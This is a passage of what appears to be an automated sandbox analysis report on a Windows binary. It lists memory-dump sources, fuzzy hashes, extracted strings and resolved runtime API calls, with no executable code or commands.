                                                                        • Opcode ID: 7b9a6866fc4e5d30e60d019d32dbd4ea46c18ece08942ca496210e84bbbb75cb
                                                                        • Instruction ID: 32df4f5ca928b1c4db86954fec2fd0b7d1b741fb7c4248b2e7c729c7ce3ce05b
                                                                        • Opcode Fuzzy Hash: 7b9a6866fc4e5d30e60d019d32dbd4ea46c18ece08942ca496210e84bbbb75cb
                                                                        • Instruction Fuzzy Hash: D111BFB0209380CBC3558F3A945052BFBE0EB82708F585E6DE0D27B391D374CD1A9B4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %!-0$:g;1$j
                                                                        • API String ID: 0-565037024
                                                                        • Opcode ID: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
                                                                        • Instruction ID: 596850defd4a036336a324cb21a7a3242656b73628fcb9d0064f5a2a21d3f7d4
                                                                        • Opcode Fuzzy Hash: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
                                                                        • Instruction Fuzzy Hash: A8F044A00083408BC7018F29955141BFFE0FB96218F806E2CE0E67B282D3B4C60A8B4B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "
                                                                        • API String ID: 0-123907689
                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                        • Instruction ID: b5b56033d86e36a5a2f775e18004cfca431a6ac7bf94099ec4257ac67d618ec2
                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                        • Instruction Fuzzy Hash: 80710D32B083354BD714CE2AD48031FBBE2ABC5710F99896FE4D597351D639EC45878A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3dac00791858fab75043c3ebe8725bd6b90e717e613227aa0d7df2b38d43a0c8
                                                                        • Instruction ID: 675397662e7d35c3e988c68934b2adc1cfbc6c7944ee00e9ec449aaad2b39987
                                                                        • Opcode Fuzzy Hash: 3dac00791858fab75043c3ebe8725bd6b90e717e613227aa0d7df2b38d43a0c8
                                                                        • Instruction Fuzzy Hash: 32911271A483258BD320EF55D89172BB3A1FFD1354F48892EE8C54B390E778D905CB9A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a9b9628c1fd3a7af3e7b851a87d3cce98a572a95508a51e7ee5e35bc07ab5006
                                                                        • Instruction ID: 6fa81707170a7b0eec34b7c549ef7d1de648c0191335202d19104e511ca05f9f
                                                                        • Opcode Fuzzy Hash: a9b9628c1fd3a7af3e7b851a87d3cce98a572a95508a51e7ee5e35bc07ab5006
                                                                        • Instruction Fuzzy Hash: CB51C0B5A042009FC714EF18D880927B7A1FF84328F19467EE899AB392D735EC51CF95
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d624a46ec4e71eabbd80c37bbad157a9d24962d0d9c9ffba726a93ffd2bd3c95
                                                                        • Instruction ID: a6169620d5a1696827cd8f84d74400514db1317b9fd11854ebdf9f64215e6560
                                                                        • Opcode Fuzzy Hash: d624a46ec4e71eabbd80c37bbad157a9d24962d0d9c9ffba726a93ffd2bd3c95
                                                                        • Instruction Fuzzy Hash: D8314A76B043046BE710A9659C85F3B729ADBC8758F04057EFE4493252F739EC0183E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e39b47d5e8a9fdadff90607e363d12ddf690496f365585e828c43316a0f8579
                                                                        • Instruction ID: 6806c5bbc4d6b822e97fdcaec603f9dae13aeb23598a5c10dbecc01c31c55fc2
                                                                        • Opcode Fuzzy Hash: 2e39b47d5e8a9fdadff90607e363d12ddf690496f365585e828c43316a0f8579
                                                                        • Instruction Fuzzy Hash: D9317A299492E586C332CA3D84E016EBF906D972247A943FFCCF11F3C3C556898687E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abb1041f84a4648d79a0668f75aff97b8991a851480defd9ebff2808c4dda2e0
                                                                        • Instruction ID: 561eeec7ef4372a3df09e76981c1185a624b11daafb68e3f07fe16c596ccf13b
                                                                        • Opcode Fuzzy Hash: abb1041f84a4648d79a0668f75aff97b8991a851480defd9ebff2808c4dda2e0
                                                                        • Instruction Fuzzy Hash: 733191B15483408BC7349F14C8923EBB7B1FFA6354F14991DE4C95B391E3788981CB9A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 182ff49e939f1398294b9512b1f3ca232d73da5c2630492eafcdb88c1e4c075a
                                                                        • Instruction ID: 58e8886864d4165c492f53d94ac2ec571c49354c70431e2038b14aa9fdf686d5
                                                                        • Opcode Fuzzy Hash: 182ff49e939f1398294b9512b1f3ca232d73da5c2630492eafcdb88c1e4c075a
                                                                        • Instruction Fuzzy Hash: 901101B4A193804FD784DF25D89052BBAB4EB8A348F88AC2CE492E7350D738D5028F06
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9c33f2bce48ae135c24f5ce7bd25ad00db60cde2b19ebbe6d6e038a32b2be15
                                                                        • Instruction ID: 73ba8bc07e1ba15521088f6cccb2f0558f02181132062fbfe265993b15d3b92d
                                                                        • Opcode Fuzzy Hash: e9c33f2bce48ae135c24f5ce7bd25ad00db60cde2b19ebbe6d6e038a32b2be15
                                                                        • Instruction Fuzzy Hash: 6A11E0B45087408FD750DF28C48878ABBE0FB09304F1488ADE899CB346D77AE58ACB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 96ccec21401edb20b9aceaf9688996d9eeb2ecb12b31d1f3d13a469f16b764ac
                                                                        • Instruction ID: ca966f37c3a7dbe55b207b2fb1d7652738fa600dc0873f2892cf3005b09500ed
                                                                        • Opcode Fuzzy Hash: 96ccec21401edb20b9aceaf9688996d9eeb2ecb12b31d1f3d13a469f16b764ac
                                                                        • Instruction Fuzzy Hash: 6501BCB090D3849BD3449F65C8A571BFFE4AB82318F906D2DF1E28B290C7B98409CF56
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BC15E2
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BC15F0
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BC1601
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BC1612
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BC1623
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BC1634
                                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00BC1645
                                                                        • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BC1656
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00BC1667
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BC1678
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BC1689
                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BC169A
                                                                        • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BC16AB
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BC16BC
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BC16CD
                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BC16DE
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BC16EF
                                                                        • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00BC1700
                                                                        • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00BC1711
                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00BC1722
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00BC1733
                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00BC1744
                                                                        • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00BC1755
                                                                        • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00BC1766
                                                                        • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00BC1777
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00BC1788
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BC1799
                                                                        • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00BC17AA
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BC17BB
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BC17CC
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00BC17DD
                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BC17EE
                                                                        • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00BC17FF
                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BC1810
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00BC1821
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00BC1832
                                                                        • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00BC1843
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00BC1854
                                                                        • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00BC1865
                                                                        • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00BC1876
                                                                        • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00BC1887
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                        • API String ID: 667068680-295688737
                                                                        • Opcode ID: 3b002ab02ea2afa63cba024747af54f9b24c7414c03de2906c960edbd9c72649
                                                                        • Instruction ID: 9a7d139587a38de7decb06bb1f7d5ed27d12cdc94d573c2afb7d72f25dae122b
                                                                        • Opcode Fuzzy Hash: 3b002ab02ea2afa63cba024747af54f9b24c7414c03de2906c960edbd9c72649
                                                                        • Instruction Fuzzy Hash: BA6128B1962790AFD7406FBEAC4E8E63EE8BA697023408556B105D7272EFF49045CF50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant
                                                                        • String ID: @$A$C$E$G$I$K$M$O$q$s$u$w$y
                                                                        • API String ID: 1927566239-3739842773
                                                                        • Opcode ID: 15324b135b59c7a619bb96e9100ef1d9eddda05e6b7ce0652f1398ce6b05658a
                                                                        • Instruction ID: cfa59d3dd61b8fc2c8280ba4920ca822f29ebbc03a68f38a0becb94220d4ac66
                                                                        • Opcode Fuzzy Hash: 15324b135b59c7a619bb96e9100ef1d9eddda05e6b7ce0652f1398ce6b05658a
                                                                        • Instruction Fuzzy Hash: 8A51247150C7D08AE325CB28845879FBFD16BE6324F184A9DE4E94B3E2C7B88845C767
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit
                                                                        • String ID: !$($-$-$2$3$7$8$=$?
                                                                        • API String ID: 2610073882-1101923984
                                                                        • Opcode ID: 55881a7127c08f3ae581755080e2831ff2bafeda491c0d68bfe4e442cdeeea3e
                                                                        • Instruction ID: ce8d9142a08082602957e39f3b723dd1a5a75d625bc2628654832b93868514b7
                                                                        • Opcode Fuzzy Hash: 55881a7127c08f3ae581755080e2831ff2bafeda491c0d68bfe4e442cdeeea3e
                                                                        • Instruction Fuzzy Hash: DE41487150C7C18FD3219B38884869EBFE16BA7324F094A9DE5E4873D2C7B58506C753
                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00BF0160,00000FA0,?,?,00BBE75E), ref: 00BBE8AC
                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00BBE75E), ref: 00BBE8B7
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00BBE75E), ref: 00BBE8C8
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BBE8DA
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BBE8E8
                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00BBE75E), ref: 00BBE90B
                                                                        • DeleteCriticalSection.KERNEL32(00BF0160,00000007,?,?,00BBE75E), ref: 00BBE927
                                                                        • CloseHandle.KERNEL32(?,?,?,00BBE75E), ref: 00BBE937
                                                                        Strings
                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BBE8B2
                                                                        • SleepConditionVariableCS, xrefs: 00BBE8D4
                                                                        • kernel32.dll, xrefs: 00BBE8C3
                                                                        • WakeAllConditionVariable, xrefs: 00BBE8E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                        • API String ID: 2565136772-3242537097
                                                                        • Opcode ID: b1b4159e4c783f0c15cf99c4d0cffbceb8720fa69088f5ec5001396d46228876
                                                                        • Instruction ID: 7767157c16aa90565e96af623fe9085876a91cc859d147678eae022bc7a8c1a6
                                                                        • Opcode Fuzzy Hash: b1b4159e4c783f0c15cf99c4d0cffbceb8720fa69088f5ec5001396d46228876
                                                                        • Instruction Fuzzy Hash: 5E01D831A503416FD7112B756C4EAB73ED8EB55B417400090F915E72B1DFB0ED01CA61
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00BB5BBB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LockitLockit::_std::_
                                                                        • String ID: R&kt$R&kt$R&kt$R&kt$bad locale name$j&V$j&V
                                                                        • API String ID: 3382485803-3629830979
                                                                        • Opcode ID: 2f0df1ff0cffe1c93ff4c2946ebc4e1ea41fc047c174822375ba14409b1121a4
                                                                        • Instruction ID: 44313d02bd9c33b13ba7fbcdee81c7a605413f09175ed60c41065fc70eedf0f1
                                                                        • Opcode Fuzzy Hash: 2f0df1ff0cffe1c93ff4c2946ebc4e1ea41fc047c174822375ba14409b1121a4
                                                                        • Instruction Fuzzy Hash: AB51D370A08B488BCB309F2894957BAB6D1EF95744F6448ACF84ADB341DBF5CD448B87
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 00BB6E27
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00BB6F2A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task_strlen
                                                                        • String ID: .jK$.jK$.jK$.jK$.jK$/jK$/jK
                                                                        • API String ID: 575380510-2724332816
                                                                        • Opcode ID: 9978611f184aa9077d375a2769183c346f4e2dbc4377be4e6fadf07d104c971f
                                                                        • Instruction ID: 3ed53bab889bd8825c4b1776c1487153b189c93bddc38a4694bc1a1cdea59f02
                                                                        • Opcode Fuzzy Hash: 9978611f184aa9077d375a2769183c346f4e2dbc4377be4e6fadf07d104c971f
                                                                        • Instruction Fuzzy Hash: 1F31AE794483089FCA10EF14D48267AB7E9EFA9354F5488A9E88887701E3B5EC40CB93
                                                                        APIs
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00BCDBC9
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00BCDCD7
                                                                        • CatchIt.LIBVCRUNTIME ref: 00BCDD28
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00BCDE29
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00BCDE44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 4119006552-393685449
                                                                        • Opcode ID: 95c816ba995e998f69269be538fc25885f9b79849cc1016efbe7c3a949c6d047
                                                                        • Instruction ID: 4b7daa49209e6fd29968d90c448bb4ec1763ec1e7b84cee379ac3234c8758dff
                                                                        • Opcode Fuzzy Hash: 95c816ba995e998f69269be538fc25885f9b79849cc1016efbe7c3a949c6d047
                                                                        • Instruction Fuzzy Hash: E4B14679800209AFCF19DFA4C881EAEBBF5EF54310B1545BEE8156B212D730EA51CBA1
                                                                        APIs
                                                                          • Part of subcall function 00BDDD4E: CreateFileW.KERNEL32(00000000,00000000,?,00BDD9F2,?,?,00000000,?,00BDD9F2,00000000,0000000C), ref: 00BDDD6B
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDDA5D
                                                                        • __dosmaperr.LIBCMT ref: 00BDDA64
                                                                        • GetFileType.KERNEL32(00000000), ref: 00BDDA70
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDDA7A
                                                                        • __dosmaperr.LIBCMT ref: 00BDDA83
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BDDAA3
                                                                        • CloseHandle.KERNEL32(00BD7D3A), ref: 00BDDBF0
                                                                        • GetLastError.KERNEL32 ref: 00BDDC22
                                                                        • __dosmaperr.LIBCMT ref: 00BDDC29
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID:
                                                                        • API String ID: 4237864984-0
                                                                        • Opcode ID: b8dc98c9874930a13532306a6a10e3306e8423e0c5c98af8810fca8752ba1309
                                                                        • Instruction ID: e765a4f9a7852ccd5722461ea9699e37ddc2d4ca44909cab11527e563e25a4c6
                                                                        • Opcode Fuzzy Hash: b8dc98c9874930a13532306a6a10e3306e8423e0c5c98af8810fca8752ba1309
                                                                        • Instruction Fuzzy Hash: C8A14932A141459FCF19AF68DC91BADBBE1EB06324F14019EF8519F3A2EB359C12CB51
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: +`^z$+`^z$.bss$W<?$W<?
                                                                        • API String ID: 4218353326-2698662740
                                                                        • Opcode ID: 0a9afe8e1af41411e1ec7cd4b317cc508f7a3e896ce4bd606d55f7d3814c932a
                                                                        • Instruction ID: e4525b1ea40e7781472a9579757f5ad3dcbfc84d7bb569b96e03cb3acd1c1d47
                                                                        • Opcode Fuzzy Hash: 0a9afe8e1af41411e1ec7cd4b317cc508f7a3e896ce4bd606d55f7d3814c932a
                                                                        • Instruction Fuzzy Hash: F8C18C7064C3409FC7249B28CD95A2FBBE1EB86314F60489EF88A97362DA31DD45CB53
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BA437A
                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BA43CE
                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BA43FB
                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BA4402
                                                                        Strings
                                                                        Memory Dump Source
